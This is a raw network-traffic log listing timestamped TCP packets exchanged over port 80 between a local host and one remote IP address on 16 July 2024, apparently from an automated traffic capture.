                                                                            Jul 16, 2024 22:29:52.099205971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099222898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099256039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099271059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099288940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099323034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099339962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099370956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099423885 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099792004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099826097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099860907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099878073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099896908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099931002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099951029 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099965096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099998951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100016117 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100032091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100065947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100079060 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100099087 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100131989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100148916 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100166082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100198984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100214958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100233078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100265980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100281954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100297928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100332022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100351095 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.100367069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.100418091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.183839083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.183904886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.183937073 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.183954954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.183970928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184034109 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184039116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184072971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184106112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184117079 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184140921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184186935 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184212923 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184263945 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184297085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184325933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184365034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184417009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184420109 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184449911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184498072 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184510946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184550047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184580088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184600115 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184612989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184647083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184653997 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184679031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184714079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184720993 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184748888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184792042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184895992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184928894 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184961081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.184977055 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.184994936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185028076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185039997 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185060978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185094118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185100079 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185127974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185177088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185312986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185344934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185378075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185391903 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185410976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185446024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185462952 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185478926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185512066 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185519934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185544968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185576916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185590982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185609102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185642004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185657024 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185673952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185707092 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185719967 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185739994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.185785055 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.185975075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186007023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186038971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186052084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186073065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186105967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186120987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186139107 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186172009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186183929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186203003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186235905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186248064 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186268091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186300039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186312914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186332941 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186366081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186379910 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186400890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186433077 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186446905 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186465979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186499119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186511993 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186531067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186567068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186577082 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.186950922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.186985016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187001944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187017918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187052011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187063932 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187083960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187117100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187134027 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187150002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187182903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187196970 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187216043 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187248945 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187262058 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187282085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187314034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187324047 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187346935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187381029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187392950 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187413931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187447071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187458992 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187479019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187515974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187522888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187753916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187786102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187804937 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187818050 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187850952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187866926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187886000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187935114 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.187938929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.187973022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188005924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188020945 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188040018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188071966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188085079 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188105106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188137054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188152075 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188169956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188201904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188215017 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188236952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188270092 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188278913 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188302994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188334942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188347101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188369989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188419104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188632965 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188664913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188697100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188709021 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188730001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188762903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188783884 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188796043 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188828945 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188842058 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188862085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188895941 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188908100 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188927889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188961029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.188977003 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.188992977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.189027071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.189038992 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.228537083 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.272644043 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272685051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272737026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272746086 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.272770882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272804022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272820950 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.272839069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272893906 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.272917032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.272968054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273011923 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273014069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273052931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273085117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273108959 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273118973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273152113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273165941 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273185968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273231983 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273267031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273298979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273332119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273345947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273364067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273400068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273411989 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273545027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273577929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273592949 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273611069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273643970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273659945 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273675919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273708105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273721933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273741007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273773909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273787022 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.273808956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.273854971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274009943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274044037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274075985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274092913 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274110079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274142981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274156094 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274177074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274209023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274221897 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274241924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274276018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274286985 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274307966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274341106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274355888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274373055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274405003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274418116 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274439096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274471045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274485111 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274507046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274554014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274663925 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274694920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274729013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274765968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274827003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274858952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274873018 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274889946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274923086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274936914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.274955034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.274986982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275002003 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275021076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275053024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275065899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275085926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275120020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275131941 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275151968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275197983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275213957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275233030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275264978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275279045 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275300026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275368929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275680065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275712013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275744915 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275757074 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275779009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275813103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275823116 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275846004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275878906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275887012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275912046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275945902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.275954962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.275979042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276010990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276020050 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276043892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276076078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276084900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276109934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276141882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276149988 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276176929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276210070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276217937 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276242018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276330948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276335001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276604891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276638985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276653051 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.276690960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276725054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.276736975 CEST4973080192.168.2.423.227.193.59
